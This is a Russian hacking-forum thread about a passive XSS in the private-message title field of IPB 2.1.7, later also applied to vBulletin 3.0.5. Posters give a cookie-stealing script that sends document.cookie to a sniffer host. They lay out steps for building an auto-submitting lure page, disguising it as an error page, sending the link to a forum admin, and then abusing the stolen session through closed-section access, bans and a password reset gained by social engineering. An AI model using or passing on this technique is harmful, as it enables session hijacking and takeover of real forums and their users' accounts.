IPB 2.1.7 passive XSS
 

Вот нашел сейчас пассивный хсс в ипб 2.1.7(на 2.1.4 тоже работает, на остальных не проверял).
При заполнении формы отправки лс, в графу "Заголовок сообщения" пишем:
напрмер:
Жмём предварительный осмотр и вот наш алерт. Удачно использовать багу можно только через Passive Xss tools (предварительно его подправив), т.к. данные принимаются только чрез POST и стоит ограничение на 40 символов.

Passive-Xss-tool by DRON-ANARCHY
и
Passive xss tool by Dg-X (MySQL)

поясните - какой толк от этой дыры, если она работает только в Предварительном просмотре, при отправки мессаги, код не выполняется, а добавляется в заголовок как обычный текст?

Составь html ку... используй post
я спомощью такой XSS немало поимел!

а можно пример такой html - ки?

Если я правильно понял, то должно быть что-то типа:

Эту страницу размещаешь где-нибудь в сети, присылаешь на нее ссылку, когда юзер переходит по ней, он автоматически перенаправляется на целевой форум, потом при учете, что по кукисам он зарегенный пользователь( не зарегистрированным нельзя отправлять сообщения ) он попадает на страницу предварительного просмотра написанного сообщения в своем профиле, на которой выполнится JavaScript код, который отправит его куки твоему снифферу.

Passive XSS у меня так и не заработал, так что попытался тут кое-что свое замутить:

Типа скрипт, для юзания данной уязвимости. Инструкция по использованию:
1) Открываем файлик (ipbdeath.htm);
2) Вписываем туда, где указано АДРЕС ФОРУМА-ЖЕРТВЫ;
3) По желанию меняем адрес сниффера. По умолчанию <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
4) Изменяем АДРЕС, КУДА БУДЕТ РЕДИРЕКТИТЬСЯ ПОСЛЕ ОТПРАВКИ КУКИСОВ.
5) Выкладываем этот файлик где-нибудь (не забудьте переименовать, а то "ipbdeath.htm" о многом говорит :) )
6) Даем на него ссылку админу форума, лучше всего это делать на самом форуме: в топике или в PM.
7) Все, ждем результата на сниффере.

Принцип работы:
1) Пройдя по ссылке, админ попадает на нашу страничку, генерируется нужный POST-запрос. Далее админ автоматически редиректится на страницу отправки PM.
2) Скрипт срабатывает.
3) и страничка сразу редиректится туда, куда вы указали (лучше, думаю, указать на какой-нибудь топик форума, дабы тоже было меньше подозрений).

Принцип работы очень прост, постарался просто облегчить использование xss и немного уменьшить палевность. Еще, если форум закэширован, редиректы проскочут быстро, и можно не заметить особо.

В общем, жду отзывов, просьба ногами не пинать, я нубик пока :rolleyes:

IPB Death

Retscan
А скрипт то не пашет, сам пробывал исправить, ниче не вышло((( :(
Пришлось делать свое, сделано совсем по другому, что бы усыпить бдительность жертвы, так как не ламер может понять что ему подсунули.Сделал просто напросто фишку под страницу ошибки на narod.ru , чел заходит, а яему ошибку и пишет что сейчас будет перемещен обратно. Но он может все таки просмотреть хтмл код, дык так как я не знаю как закодирывать адресс снифака советую сунуть его в глубь, что б если и просмотрел хтмл код, до него не добрался.
Ну и естественно надо файл кидать на народ, и не забудьте его отредактирывать!
Файлик

Бред, не пройдет, т.к. кукисы будут отправляться именно того сервера, где находится твой скрипт =)

Думаешь я б его выложил есле б не тестил??
тем более ты принцип не понял.Щас обЪясню

Скачали файлик, ложим его на свой домен на народе
акк.народ.ру/файл.хтм
и даем админу на форуме, он заходит на сам файл а не на страницу ошибки, сама страница уже вписана в тот файл

Добавь в ту html:

А с этого момента по подробней можно?)

ну хз... я так обчно делал...

сорри время мало неуспел всё обрезать...
короче тестим ;)

_GaLs_
точно не помню....
но смысл такой....

у модера или админа есть функция изменить данные юзера...
и там при изменении даты рождения поле не фильтруется

А ещё если я не ошибаюсь ,то можно код выше разместить на ifolder.ru как шапку и на форум выложить ссылку на файл который расположен на ifolder. Ток чёт куки на приходят на лог.
Зарегистрировать акк можно здесь
Ток надо я думаю надо убрать перенаправление в скрипте.

Лучше впаривать ссылку на страницу такого типа
А все "подозрительные" действия совершать во фрейме
Как на видео с ДЛ

_http://rapidshare.com/files/16889954/IPB_217_XSS.rar.html
пасс: dl

да и еще как узнать версию форума qwerty очень подозрительно то что к примеру чтобы узнать версию 2.1.* надо прописать путь до файла info.php я прописываю в qwerty ну в форуме естесно он мне пишет типа пожалуйста подождите форум загружается и потом главная страница форума,это что означает что файл присутсвует??И как узнать что это точно версия 221???

Попробуй в java-скриптах поглядеть, я обычно там всегда версию находил (но не всегда она там правельная)
Вот в Античате я думаю версия не правильная:)

У меня получилось провернуть это на vbulletin 3.0.5. Спасибо dl и spheere за идею :)
Принцип тот же, вставляем ксс в поле "тема".
Дело в том, что на vbull скрипт срабатывал при нажатии кнопки"предварительный просмотр". Поэтому вместо form.submit() следует использовать
Естественно, предварительно добавив атрибут id кнопке предпросмотра.

dante
Вариантов много... Можно просто залогиниться и почитать закрытые разделы, побанить кого-нубдь =) ... Можно взять и написать другому админу (если таковой есть) : "Так, мол, так... Пароль забыл, по кукисам все время логинит, а ща вот решил мыло сменить, так пароль требуют... Смени мне его плз на Idin@h=) "
И так далее ;)

------------------------------------------------------------------

Grey: тема закрыта, все сообщения не имеющие информационной ценности удалены, ссылка на тему добавлена в тему [Обзор уязвимостей Ipb].